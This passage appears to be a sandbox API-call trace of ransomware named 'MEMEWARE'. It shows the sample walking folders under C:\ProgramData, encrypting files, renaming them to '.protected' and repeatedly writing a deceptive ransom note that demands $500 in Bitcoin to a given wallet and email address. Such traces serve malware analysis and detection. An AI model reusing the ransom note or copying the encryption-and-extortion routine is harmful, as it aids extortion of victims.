lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.556] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.556] CloseHandle (hObject=0xb4) returned 1 [0071.556] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.protected") returned 70 [0071.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.protected" (normalized: "c:\\programdata\\microsoft\\user account 
pictures\\guest.bmp.protected")) returned 1 [0071.560] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Windows") returned -1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Program Files") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="Program Files (x86)") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="$Recycle.bin") returned 1 [0071.560] lstrcmpiW (lpString1="user.bmp", lpString2="System Volume Information") returned 1 [0071.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.560] StrStrIW (lpFirst="user.bmp", lpSrch=".protected") returned 0x0 [0071.560] lstrcmpW (lpString1="user.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.560] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.560] StrStrW (lpFirst="user.bmp", lpSrch=".txt") returned 0x0 [0071.560] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.561] StrStrW (lpFirst="user.bmp", lpSrch=".rar") returned 0x0 [0071.561] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp") returned 59 [0071.561] StrStrW (lpFirst="user.bmp", lpSrch=".zip") returned 0x0 [0071.561] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.561] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.561] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.562] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.562] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.562] CloseHandle (hObject=0xb4) returned 1 [0071.562] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.protected") returned 69 [0071.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.protected" (normalized: "c:\\programdata\\microsoft\\user account 
pictures\\user.bmp.protected")) returned 1 [0071.563] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.563] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.563] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 68 [0071.563] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\user account pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.563] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.563] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.564] lstrlenA (lpString="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") returned 684 [0071.564] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.564] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.564] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.564] CloseHandle (hObject=0xa4) returned 1 [0071.564] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Windows") returned -1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Program Files") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="Program Files (x86)") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="$Recycle.bin") returned 1 [0071.564] lstrcmpiW (lpString1="Vault", lpString2="System Volume Information") returned 1 [0071.564] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned 34 [0071.564] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0071.564] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0071.564] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*") returned 36 [0071.564] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.565] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.565] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.565] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\.") returned 36 [0071.565] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.565] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.565] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 
[0071.565] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.565] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.565] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.565] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\..") returned 37 [0071.565] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.565] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.565] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.565] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.565] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 52 [0071.565] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\vault\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.568] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.568] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.571] lstrlenA (lpString="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") returned 684 [0071.571] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.571] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.571] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.571] CloseHandle (hObject=0xa4) returned 1 [0071.571] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Windows") returned -1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Program Files") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="Program Files (x86)") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="$Recycle.bin") returned 1 [0071.571] lstrcmpiW (lpString1="VISIO", lpString2="System Volume Information") returned 1 [0071.571] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO") returned 34 [0071.571] lstrcmpW (lpString1="VISIO", lpString2=".") returned 1 [0071.571] lstrcmpW (lpString1="VISIO", lpString2="..") returned 1 [0071.571] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*") returned 36 [0071.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.572] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.572] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\.") returned 36 [0071.572] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.572] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.572] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 
[0071.572] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.572] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.572] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.572] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.572] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\..") returned 37 [0071.572] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.572] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.573] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.573] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.573] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 52 [0071.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.573] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.573] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.574] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.574] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.574] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.574] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.574] CloseHandle (hObject=0xa4) returned 1 [0071.574] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.574] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0071.574] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Windows") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files (x86)") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="$Recycle.bin") returned 1 [0071.574] lstrcmpiW (lpString1="Windows Defender", lpString2="System Volume Information") returned 1 [0071.574] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned 45 [0071.574] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0071.574] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0071.574] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*") returned 47 [0071.574] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.576] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\.") returned 47 [0071.576] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.576] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\..") returned 48 [0071.576] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.576] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.576] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Windows") returned -1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files") returned -1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files (x86)") returned -1 [0071.576] lstrcmpiW 
(lpString1="Definition Updates", lpString2="$Recycle.bin") returned 1 [0071.576] lstrcmpiW (lpString1="Definition Updates", lpString2="System Volume Information") returned -1 [0071.576] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates") returned 64 [0071.576] lstrcmpW (lpString1="Definition Updates", lpString2=".") returned 1 [0071.576] lstrcmpW (lpString1="Definition Updates", lpString2="..") returned 1 [0071.576] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 66 [0071.576] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.577] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\.") returned 66 [0071.577] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.577] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\..") returned 67 [0071.577] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.577] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.577] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0071.577] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0071.577] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 71 [0071.577] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0071.577] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0071.578] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned 73 [0071.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 
